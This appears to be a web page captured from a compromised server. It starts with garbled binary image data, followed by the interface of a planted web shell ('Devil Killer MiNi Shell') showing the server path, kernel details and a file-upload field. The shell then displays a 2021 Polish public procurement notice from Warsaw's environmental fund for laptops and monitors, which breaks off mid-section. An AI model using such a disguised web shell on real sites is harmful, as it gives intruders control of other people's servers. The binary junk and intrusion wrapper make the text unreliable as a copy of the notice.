JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210712/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210712/0011150501-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00111505 z dnia 2021-07-12</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup i dostawa przenośnych zestawów komputerowych oraz urządzeń wielofunkcyjnych dla WFOŚiGW w Warszawie. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Wojewódzki Fundusz Ochrony Środowiska i Gospodarki Wodnej w Warszawie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 142148155</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ogrodowa 5/7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-893</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">22 504 41 00</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">22 504 41 39</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">poczta@wfosigw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wfosigw.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> samorządowa osoba prawna </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup i dostawa przenośnych zestawów komputerowych oraz urządzeń wielofunkcyjnych dla WFOŚiGW w Warszawie. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1f53afdc-e302-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00111505</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00017517/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Zakup i dostawa przenośnych zestawów komputerowych oraz urządzeń wielofunkcyjnych dla WFOŚiGW w Warszawie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/wfosigw <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/wfosigw</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, były przekazywane w formie elektronicznej za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do Zamawiającego”. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do Zamawiającego”, po których pojawi się komunikat, że wiadomość została wysłana do Zamawiającego.<br/>Zamawiający będzie przekazywał Wykonawcom informacje w formie elektronicznej za pośrednictwem platformazakupowa.pl Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem platformazakupowa.pl do konkretnego Wykonawcy. <br/>Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na platformazakupowa.pl przesłanych przez Zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>Zamawiający, zgodnie z § 3 ust. 3 Rozporządzenia Prezesa Rady Ministrów w sprawie użycia środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego oraz udostępnienia i przechowywania dokumentów elektronicznych (Dz. U. z 2017 r. poz. 1320; dalej: “Rozporządzenie w sprawie środków komunikacji”), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.: <br/>1)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>2)	komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje;<br/>3)	zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10.0.;<br/>4)	włączona obsługa JavaScript;<br/>5)	zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf;<br/>6)	Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8;<br/>7)	Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany według czasu lokalnego serwera synchronizowanego <br/>z zegarem Głównego Urzędu Miar. <br/>Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego: <br/>1)	akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem w zakładce „Regulamin" oraz uznaje go za wiążący;<br/>2)	zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem. <br/>Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z platformazakupowa.pl, w szczególności za sytuację, gdy Zamawiający zapozna się <br/>z treścią oferty przed upływem terminu składania ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do Zamawiającego”). Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu ponieważ nie został spełniony obowiązek narzucony w art. 221 ustawy Pzp.<br/>Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące <br/>w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców" na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Spełniając obowiązek informacyjny wynikający z art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych, zwanym dalej RODO) Wojewódzki Fundusz Ochrony Środowiska i Gospodarki Wodnej w Warszawie informuje, że: <br/>1)	Administratorem Pani/Pana danych osobowych jest Wojewódzki Fundusz Ochrony Środowiska <br/>i Gospodarki Wodnej w Warszawie, ul. Ogrodowa 5/7, 00-893 Warszawa, tel. 22 504 41 00, <br/>e-mail: poczta@wfosigw.pl<br/>2)	Wyznaczono Inspektora ochrony danych, z którym można się skontaktować poprzez adres <br/>e-mail: iod@wfosigw.pl<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. b) i c) RODO, w tym ustawy Prawo zamówień publicznych w celu przeprowadzenia postępowania o udzielenie zamówienia publicznego, którego wartość szacunkowa przekracza 130 000 złotych netto. <br/>4)	Podanie przez Panią/Pana danych osobowych jest dobrowolne lecz niezbędne w celu wzięcia udziału w procedurze, o której mowa w pkt 3.<br/>5)	Pani/Pana dane osobowe będą przetwarzane przez okres niezbędny do realizacji celu wymienionego w pkt 3, aż do momentu wygaśnięcia obowiązków przetwarzania danych wynikających z przepisów prawa, w tym przepisów dotyczących archiwizacji. W przypadku unieważnienia postępowania o udzielenie zamówienia publicznego dane będą przetwarzane do momentu wygaśnięcia obowiązków przetwarzania danych. <br/>6)	Pani/Pana dane osobowe mogą zostać przekazane (w niezbędnym zakresie do realizacji celu wskazanego w pkt 3) podmiotom przetwarzającym dane osobowe na rzecz Administratora, tj. usługi: IT, pocztowe. Ponadto, dane mogą zostać udostępnione innym podmiotom uprawnionym do dostępu do danych osobowych na podstawie właściwych przepisów prawa polskiego.<br/>7)	Pani/Pana dane osobowe nie są wykorzystywane w celu podejmowania decyzji, która opiera się wyłącznie na zautomatyzowanym przetwarzaniu, w tym profilowaniu.<br/>8)	Pani/Pana dane osobowe nie będą przekazywane do państwa trzeciego.<br/>9)	Ma Pani/Pan prawo do:<br/>a)	dostępu do danych osobowych,<br/>b)	sprostowania danych osobowych, <br/>c)	usunięcia danych osobowych („prawo do bycia zapomnianym”),<br/>d)	ograniczenia przetwarzania danych osobowych,<br/>e)	przenoszenia danych osobowych, <br/>f)	sprzeciwu wobec przetwarzania danych osobowych,<br/>g)	wniesienia skargi do organu nadzorczego właściwego w sprawach ochrony<br/>danych osobowych. <br/> - może być realizowane w oparciu i na zasadach określonych w RODO. <br/>Spełniając obowiązek informacyjny wynikający z art. 14 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych, zwanym dalej RODO) Wojewódzki Fundusz Ochrony Środowiska i Gospodarki Wodnej w Warszawie informuje, że: <br/>1)	Administratorem Pani/Pana danych osobowych jest Wojewódzki Fundusz Ochrony Środowiska <br/>i Gospodarki Wodnej w Warszawie, ul. Ogrodowa 5/7, 00-893 Warszawa, tel. 22 504 41 00, <br/>e-mail: poczta@wfosigw.pl<br/>2)	Wyznaczono Inspektora ochrony danych, z którym można się skontaktować poprzez adres <br/>e-mail: iod@wfosigw.pl<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. b) i c) RODO, w tym ustawy Prawo zamówień publicznych w celu przeprowadzenia postępowania o udzielenie zamówienia publicznego, którego wartość szacunkowa przekracza 130 000 zł. <br/>4)	Podanie przez Panią/Pana danych osobowych jest wymogiem ustawowym lecz niezbędnym w celu wzięcia udziału w procedurze, o której mowa w pkt 3.<br/>5)	Przetwarzane będą następujące kategorie danych osobowych: imię i nazwisko, adres e-mail, numer telefonu.<br/>Klauzule informacyjne zawarte zostały w Rozdziałach 38 oraz 39 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-4/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakup i dostawa 14 przenośnych zestawów komputerowych typu I.<br/>1)	Przedmiotem zamówienia jest zakup i dostawa 14 przenośnych zestawów komputerowych, jednego producenta, jednej marki i tego samego typu, ten sam model, o minimalnych parametrach określonych w poniższej tabeli, dalej zwany „Sprzętem”. <br/>2)	Zestaw obejmuje: laptop z oprogramowaniem systemowym, monitor, stację dokującą oraz oprogramowanie MS Office 2019 lub równoważne. <br/>3)	Dostarczony Sprzęt musi być fabrycznie nowy, wolny od wad, pakowany w oryginalne opakowania producenta oraz nie może być obciążony prawami osób trzecich. <br/>4)	Wykonawca jest zobowiązany do spełnienia wymogów w zakresie zapewnienia efektywności energetycznej dostarczonego Sprzętu, wynikających z Rozporządzenia Parlamentu Europejskiego i Rady (WE) 106/2008 r. z dnia 15.01.2008 r. w sprawie unijnego programu znakowania efektywności energetycznej urządzeń biurowych. <br/>5)	Wykonawca zobowiązany będzie dostarczyć Sprzęt do siedziby WFOŚiGW w Warszawie przy ul. Ogrodowej 5/7 na własny koszt, ryzyko, własnym transportem wraz z rozładunkiem i wniesieniem we wskazane miejsce. O planowanej dostawie Sprzętu Wykonawca zobowiązany jest poinformować Zamawiającego, z wyprzedzeniem co najmniej 1 dnia roboczego.<br/>6)	Wykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach opisanych w projekcie umowy stanowiącej odpowiednio załącznik nr 4 a do SWZ ; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30213100-6 - Komputery przenośne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30231300-0 - Monitory ekranowe</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">70 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wynikiem dla każdej z ofert będzie suma punktów uzyskanych w podanych wyżej kryteriach.<br/>1) Kryterium ceny C=( Cn/Cb)x60<br/>gdzie:<br/>C – ilość punktów za cenę brutto (max 60 pkt.)<br/>Cn – cena brutto najniższa wśród ofert <br/>Cb – cena brutto badanej oferty<br/><br/> 2) Kryterium terminu gwarancji G (max 40 pkt.) <br/>Liczba punktów za kryterium termin realizacji zostanie obliczona wg następujących zasad:<br/> 24 miesiące – 0 pkt. <br/> 30 miesięcy – 20 pkt. <br/> 36 miesięcy – 40 pkt.<br/>Minimalny okres gwarancji wynosi 24 miesiące od daty podpisania protokołu odbioru Sprzętu.<br/>Jeżeli Wykonawca zaoferuje okres gwarancji krótszy niż 24 miesiące – oferta takiego Wykonawcy zostanie odrzucona jako niezgodna z warunkami zamówienia.<br/>W przypadku, gdy Wykonawca nie wskaże oferowanego okresu gwarancji, Zamawiający uzna, że Wykonawca zaoferował minimalny wskazany przez Zamawiającego okres gwarancji, tj. 24 miesiące, wówczas w kryterium „termin gwarancji” otrzyma 0 pkt.<br/>Jeżeli Wykonawca zaoferuje okres gwarancji dłuższy niż 36 miesięcy Zamawiający wpisze ten termin w §6 ust 1 projektu umowy, stanowiącej załącznik nr 4a do SWZ, natomiast do celów oceny ofert uzna, iż Wykonawca zaoferował okres gwarancji wynoszący 36 miesięcy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakup i dostawa 2 przenośnych zestawów komputerowych typu II.<br/>1)	Przedmiotem zamówienia jest zakup i dostawa 2 przenośnych zestawów komputerowych, jednego producenta, jednej marki i tego samego typu, ten sam model, o minimalnych parametrach określonych w poniższej tabeli, dalej zwany „Sprzętem”. <br/>2)	Zestaw obejmuje: laptop z oprogramowaniem systemowym, 2 szt. monitorów, stację dokującą oraz MS Office 2019 lub równoważne. <br/>3)	Dostarczony Sprzęt musi być fabrycznie nowy, wolny od wad, pakowany w oryginalne opakowania producenta oraz nie może być obciążony prawami osób trzecich. <br/>4)	Wykonawca jest zobowiązany do spełnienia wymogów w zakresie zapewnienia efektywności energetycznej dostarczonego Sprzętu, wynikających z Rozporządzenia Parlamentu Europejskiego i Rady (WE) 106/2008 r. z dnia 15.01.2008 r. w sprawie unijnego programu znakowania efektywności energetycznej urządzeń biurowych. <br/>5)	Wykonawca zobowiązany będzie dostarczyć Sprzęt do siedziby WFOŚiGW w Warszawie przy ul. Ogrodowej 5/7 na własny koszt, ryzyko, własnym transportem wraz z rozładunkiem i wniesieniem we wskazane miejsce. O planowanej dostawie Sprzętu Wykonawca zobowiązany jest poinformować Zamawiającego, z wyprzedzeniem co najmniej 1 dnia roboczego.<br/>6)	Wykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach opisanych w projekcie umowy stanowiącej odpowiednio załącznik nr 4 a do SWZ ; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30213100-6 - Komputery przenośne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30231300-0 - Monitory ekranowe</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">70 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wynikiem dla każdej z ofert będzie suma punktów uzyskanych w podanych wyżej kryteriach.<br/>1) Kryterium ceny C=( Cn/Cb)x60<br/>gdzie:<br/>C – ilość punktów za cenę brutto (max 60 pkt.)<br/>Cn – cena brutto najniższa wśród ofert <br/>Cb – cena brutto badanej oferty<br/><br/> 2) Kryterium terminu gwarancji G (max 40 pkt.) <br/>Liczba punktów za kryterium termin realizacji zostanie obliczona wg następujących zasad:<br/> 24 miesiące – 0 pkt. <br/> 30 miesięcy – 20 pkt. <br/> 36 miesięcy – 40 pkt.<br/>Minimalny okres gwarancji wynosi 24 miesiące od daty podpisania protokołu odbioru Sprzętu.<br/>Jeżeli Wykonawca zaoferuje okres gwarancji krótszy niż 24 miesiące – oferta takiego Wykonawcy zostanie odrzucona jako niezgodna z warunkami zamówienia.<br/>W przypadku, gdy Wykonawca nie wskaże oferowanego okresu gwarancji, Zamawiający uzna, że Wykonawca zaoferował minimalny wskazany przez Zamawiającego okres gwarancji, tj. 24 miesiące, wówczas w kryterium „termin gwarancji” otrzyma 0 pkt.<br/>Jeżeli Wykonawca zaoferuje okres gwarancji dłuższy niż 36 miesięcy Zamawiający wpisze ten termin w §6 ust 1 projektu umowy, stanowiącej załącznik nr 4a do SWZ, natomiast do celów oceny ofert uzna, iż Wykonawca zaoferował okres gwarancji wynoszący 36 miesięcy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj 